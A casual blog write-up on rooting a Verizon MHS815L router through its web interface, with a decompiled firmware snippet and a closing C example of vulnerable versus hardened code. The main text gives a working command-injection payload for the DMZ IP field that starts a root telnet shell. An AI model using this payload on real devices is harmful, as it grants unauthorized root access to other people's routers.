Verizon MHS815L: from WebUI to root in 30 minutes

by Chloe, June 6, 2024

Credits: my very amazing friend for providing me with remote access to the router; this guy on the OpenWRT forum for grabbing the firmware files so I could take a closer peek

enough introductions, let's get through this

so today, after i got access to my t-mobile router, my friend asked me: obviously i can't give up a challenge to root any device, so i asked them to tunnel it. upon them tunneling and giving me the url, i got into the webui. well damn, there's basically nothing here. a ping tool would've been nice for command execution, y'know? my friend linked me to the openwrt post showing a URL to some internal settings page. this is starting to get interesting! i got onto the settings page. there's barely anything here... i tried shoving $(telnetd) in some text fields and applying, apparently that didn't work. then my friend sent me a "firmware.sfp" file. we're getting somewhere now! i looked inside and found a bunch of services inside init.d.

[chloe@Atlas init.d]$ ls -la
total 172
drwxr-xr-x  2 chloe chloe  4096 Aug 23  2016 .
drwxr-xr-x 15 chloe chloe  4096 Aug 23  2016 ..
-rwxr-xr-x  1 chloe chloe  3012 Aug 23  2016 boot
-rwxr-xr-x  1 chloe chloe  1056 Aug 23  2016 bp
-rwxr-xr-x  1 chloe chloe   267 Aug 23  2016 cgroups
-rwxr-xr-x  1 chloe chloe   385 Aug 23  2016 cron
-rwxr-xr-x  1 chloe chloe 12517 Aug 23  2016 dnsmasq
-rwxr-xr-x  1 chloe chloe   389 Aug 23  2016 done
-rwxr-xr-x  1 chloe chloe  4061 Aug 23  2016 dropbear
-rwxr-xr-x  1 chloe chloe   233 Aug 23  2016 firewall
-rwxr-xr-x  1 chloe chloe  1322 Aug 23  2016 franklind
-rwxr-xr-x  1 chloe chloe   309 Aug 23  2016 frankwebd
-rwxr-xr-x  1 chloe chloe  4062 Aug 23  2016 hostless
-rwxr-xr-x  1 chloe chloe   905 Aug 23  2016 kfatal
-rwxr-xr-x  1 chloe chloe  1268 Aug 23  2016 kthp
-rwxr-xr-x  1 chloe chloe   510 Aug 23  2016 ld7032
-rwxr-xr-x  1 chloe chloe  2015 Aug 23  2016 led
-rwxr-xr-x  1 chloe chloe   309 Aug 23  2016 lighttpd
-rwxr-xr-x  1 chloe chloe  4067 Aug 23  2016 marvell-wlan-sd8787
-rwxr-xr-x  1 chloe chloe   198 Aug 23  2016 max8903
-rwxr-xr-x  1 chloe chloe   368 Aug 23  2016 mmi
-rwxr-xr-x  1 chloe chloe   549 Aug 23  2016 network
-rwxr-xr-x  1 chloe chloe   195 Aug 23  2016 procd
-rwxr-xr-x  1 chloe chloe  9925 Aug 23  2016 radvd
-rwxr-xr-x  1 chloe chloe   454 Aug 23  2016 rcS
-rwxr-xr-x  1 chloe chloe  2091 Aug 23  2016 sequansd
-rwxr-xr-x  1 chloe chloe   483 Aug 23  2016 sfp2
-rwxr-xr-x  1 chloe chloe   159 Aug 23  2016 sqn_icc
-rwxr-xr-x  1 chloe chloe  1809 Aug 23  2016 sqnimsd
-rwxr-xr-x  1 chloe chloe  1824 Aug 23  2016 sqnomadmd
-rwxr-xr-x  1 chloe chloe   126 Aug 23  2016 sysctl
-rwxr-xr-x  1 chloe chloe   674 Aug 23  2016 sysntpd
-rwxr-xr-x  1 chloe chloe   639 Aug 23  2016 tca7408
-rwxr-xr-x  1 chloe chloe   878 Aug 23  2016 telnet
-rwxr-xr-x  1 chloe chloe   102 Aug 23  2016 umount
-rwxr-xr-x  1 chloe chloe   160 Aug 23  2016 usb
-rwxr-xr-x  1 chloe chloe   249 Aug 23  2016 watchdog
-rwxr-xr-x  1 chloe chloe   266 Aug 23  2016 zzz
wait...
-rwxr-xr-x  1 chloe chloe  1322 Aug 23  2016 franklind
-rwxr-xr-x  1 chloe chloe   309 Aug 23  2016 frankwebd
we're finally getting SOMEWHERE now. i looked inside the service file for "frankwebd" and found it was sitting inside /usr/sbin.
[chloe@Atlas sbin]$ ls -la frank*
-rwxr-xr-x 1 chloe chloe 119701 Aug 23  2016 franklin-web.fcgi
-rwxr-xr-x 1 chloe chloe 247312 Aug 23  2016 frankwebd
well shit! finally! the fcgi wasn't exactly what i was looking for but this'll be useful. i pulled these 2 executables into Ghidra and found nothing in "frankwebd" but as i started clicking in "franklin-web.fcgi"...
strcpy(acStack_d0,"uci set firewall.DMZ=redirect > /dev/null");
system(acStack_d0);
strcpy(acStack_d0,"uci set firewall.DMZ.target=DNAT > /dev/null");
system(acStack_d0);
strcpy(acStack_d0,"uci set firewall.DMZ.src=wan > /dev/null");
system(acStack_d0);
strcpy(acStack_d0,"uci set firewall.DMZ.dest=wlan > /dev/null");
system(acStack_d0);
strcpy(acStack_d0,"uci set firewall.DMZ.proto=\'tcp udp\' > /dev/null");
system(acStack_d0);
are you fucking serious? we're passing unsanitized input straight into a shell command? i then remembered the router had a page on the webui to turn on DMZ. finally, something? i opened the firefox network tab, then i enabled it (setting it to some bogus local ip). i then edited the request to set the DMZ IP to "192.168.69.12$(telnetd -l /bin/sh -p6969)". hoping this would finally work, i dmed my friend asking if they could connect to port 6969 on the router. after a minute of silence, they sent: COULD THIS HAVE BEEN IT? i then sent, "DID IT WORK?" they shortly responded with this codeblock:
% telnet 192.168.15.1 6969
Trying 192.168.15.1...
Connected to 192.168.15.1.
Escape character is '^]'.

BusyBox v1.19.4 (2016-07-07 15:29:43 CEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/usr/sbin #
NO FUCKING WAY. IT'S FINALLY OVER. after this i made a couple of shitposts on Mastodon. this concludes the writeup. go check out my friend up there in the credits.
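For anyone fixing this class of bug: below is an added C example (mine, not the firmware's code) showing the same "splice the DMZ IP into a system() string" pattern next to a hardened version that only accepts an IPv4 literal and runs uci through execvp, so no shell ever parses the value. The option name firewall.DMZ.dest_ip and the function names are assumptions for illustration.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (reconstructed, hypothetical): the value from the web
 * form is pasted into a command line and handed to /bin/sh, which expands
 * $(...), backticks, ';' and friends inside the "IP". */
int dmz_set_vulnerable(const char *ip) {
    char cmd[208];
    snprintf(cmd, sizeof cmd, "uci set firewall.DMZ.dest_ip=%s > /dev/null", ip);
    return system(cmd);   /* shell interprets metacharacters in ip */
}

/* Allow-list check: the only thing a DMZ host field should ever hold is a
 * dotted-quad IPv4 address, so parse it as one and reject everything else. */
int is_ipv4_literal(const char *ip) {
    struct in_addr a;
    return ip != NULL && strlen(ip) <= 15 && inet_pton(AF_INET, ip, &a) == 1;
}

/* Hardened: validate first, then exec uci directly with an argv array.
 * Returns -1 on rejected input or exec failure, else uci's exit status. */
int dmz_set_hardened(const char *ip) {
    if (!is_ipv4_literal(ip))
        return -1;                       /* log it and report an error to the UI */
    char opt[64];
    snprintf(opt, sizeof opt, "firewall.DMZ.dest_ip=%s", ip);
    char *argv[] = { "uci", "set", opt, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);           /* no shell involved, value is one argv */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```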